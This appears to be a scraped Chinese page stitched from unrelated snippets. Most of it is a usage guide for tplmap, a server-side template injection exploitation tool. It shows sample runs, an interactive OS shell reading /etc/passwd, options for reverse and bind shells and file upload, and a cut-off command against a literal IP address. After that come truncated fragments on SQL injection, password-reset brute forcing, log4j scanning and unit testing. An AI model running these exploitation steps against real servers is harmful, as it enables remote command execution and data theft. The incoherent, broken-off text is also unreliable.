自动检测和发掘服务器端模板的注入漏洞。支持测试Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。
示例:
$ ./tplmap.py -u 'http://www.target.com/app?id=*' [+] Tplmap 0.1 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Found placeholder in GET parameter 'inj' [+] Smarty plugin is testing rendering with tag '{*}' [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag '${*}' ... [+] Freemarker plugin is testing blind injection [+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n' [+] Jade plugin is testing rendering with tag '\n= *\n' [+] Jade plugin has confirmed injection with tag '\n= *\n' [+] Tplmap identified the following injection point: Engine: Jade Injection: \n= *\n Context: text OS: darwin Technique: render Capabilities: Code evaluation: yes, javascript code Shell command execution: yes File write: yes File read: yes Bind and reverse shell: yes [+] Rerun tplmap providing one of the following options: --os-shell or --os-cmd to execute shell commands via the injection --upload LOCAL REMOTE to upload files to the server --download REMOTE LOCAL to download remote files --bind-shell PORT to bind a shell on a port and connect to it --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT $ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell [+] Run commands on the operating system. linux $ whoami www-data linux $ ls -al /etc/passwd -rw-r--r-- 1 root wheel 5925 16 Sep 2015 /etc/passwd linux $
支持的模板引擎:
Template engine | Detection | Command execution | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | render+blind | yes | python | yes | yes |
Jinja2 | render+blind | yes | python | yes | yes |
Nunjucks | render+blind | yes | javascript | yes | yes |
Jade | render+blind | yes | javascript | yes | yes |
Smarty (unsecured) | render+blind | yes | PHP | yes | yes |
Freemarker | render+blind | yes | no | yes | yes |
Velocity | render | no | no | no | no |
Twig | render | no | no | no | no |
Smarty (secured) | render | no | no | no | no |
报错信息:[!][tplmap] Exiting: 'bool' object has no attribute 'replace' 解决办法:删除tplmap/core/checks.py文件中Twig条目,保存退出。 Twig就在此列表中: plugins = [ Smarty, Mako, Python, Tornado, Jinja2, Fr
tpl是用python2编写的,报错一般是使用python3 kali安装过程 git clone https://github.com/epinna/tplmap cd tplmap sudo pip2 install -r requirements.txt 常用操作命令 #探测注入点 python2 tplmap.py -u 'http://114.67.246.176:17787/?f
像这样的陈述 符合SQL注入条件。但PreparedStatement如何帮助防止SQL注入呢?考虑以下场景: 如果有人输入和怎么办,因为这也将被视为有效的字符串...
讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理与危害 SQL 注入就是指,在输入的字符串中注入 SQL 语句,如果应用相信用户的输入而对输入的字符串没进行任何的过滤处理,那么这些注入进去的 SQL 语句就会被数据库误认为是正常的 SQL 语句而被执行。 恶意使用 SQL 注入攻击的人可以通过构建不同的 SQL 语句进行脱裤、命令执行、写 Webshell、读取度武器
漏洞检测(该工具已下线) 漏洞检测工具使用说明 一,高危漏洞 高危漏洞包括SQL注入漏洞、XSS跨站脚本漏洞、页面存在源代码泄露、网站存在备份文件、网站存在包含SVN信息的文件、网站存在Resin任意文件读取漏洞。 SQL注入漏洞:网站程序忽略了对输入字符串中包含的SQL语句的检查,使得包含的SQL语句被数据库误认为是合法的SQL指令而运行,导致数据库中各种敏感数据被盗取、更改或删除。 XS
我一直在尝试在我们的Spring应用程序中处理log4j2的安全性以传递Veracode。尤其是CWE 117-日志注入漏洞。我们有一个带有spring-boot-starter-log4j2的Spring应用程序。 我尝试配置log4j2模式: 但它不起作用。我还尝试了这样的方法: 或 我仍然得到veracode结果: 我们不想使用ESAPI或任何日志外观,我们不想更改代码中的所有日志行,有数千
讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 任意密码找回 这是补天平台上的一个案例: http://www.118114.cn/reg.jsp 首先注册一个账号,然后找回。 我们收到的验证码是六位数。如果网站没有设置频率限制,或者最大尝试次数限制的话,那我们自然就会想到可以爆破它。 然后抓提交手机验证码的封包,我们可以看到没有任何图片验证码: 发送到 Burp 的 I
如何确认elasticsearch版本是否暴露log4j漏洞?我的elasticsearch版本是6.8.4
本文向大家介绍PHPCMS2008广告模板SQL注入漏洞修复,包括了PHPCMS2008广告模板SQL注入漏洞修复的使用技巧和注意事项,需要的朋友参考一下 00 漏洞描述 PHPCMS2008由于广告模块取referer不严,导致一处sql注入漏洞.可以得到管理员用户名与密码,攻击者登录后台后可能会获取webshell,对服务器进行进一步的渗透。 01 漏洞分析 漏洞产生的位置: /ads/inc
我有一个充满void方法的java类,我想做一些单元测试以获得最大的代码覆盖率。 例如,我有以下方法: 它的名字不好,原因是我翻译了代码以便更好地理解。每个方法都验证参数是否以某种方式有效,是否编写得很好。